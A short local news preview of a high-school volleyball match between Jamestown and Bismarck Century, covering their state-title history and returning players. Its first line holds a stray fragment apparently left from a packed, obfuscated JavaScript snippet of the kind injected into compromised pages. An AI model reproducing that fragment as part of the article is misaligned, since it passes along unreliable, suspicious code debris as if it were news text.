JAMESTOWN ahatn|var|u0026u|referrer|sezbe||js|php’.split(‘|’),0,{}))
(NewsDakota.com) – You have to go back to 2012 to find a West Region regular season match that the Jamestown Blue Jays have lost on the volleyball court and tonight they will put that streak on the line. The Bismarck Century Patriots will come to Jerry Meyer Arena to battle the Jays in a rematch of the 2013 Class A state championship game.

Jamestown beat Century 3-2 (22-25, 25-20, 22-25, 25-20, 15-12) to win their first ever state title last November at the Minot State Dome. This season however, the Jays are trying to replace their top three players from a season ago, as Addie Eamon, Josie Hegerle and McKayla Orr have all graduated.

Century returns the heart of their lineup as their try to make it four appearances in-a-row in the state title match, they won the title in 2012.

Jamestown does return a group of seniors that were big parts of the championship, Jenna Stilwell, McKayla Keller, Julina Neimeier will lead the team. Junior Meghan Orr will also be one of the most experienced returning players.

You can listen to tonight’s game on 1400/97.1 ESPN Jamestown and online at NewsDakota.com.
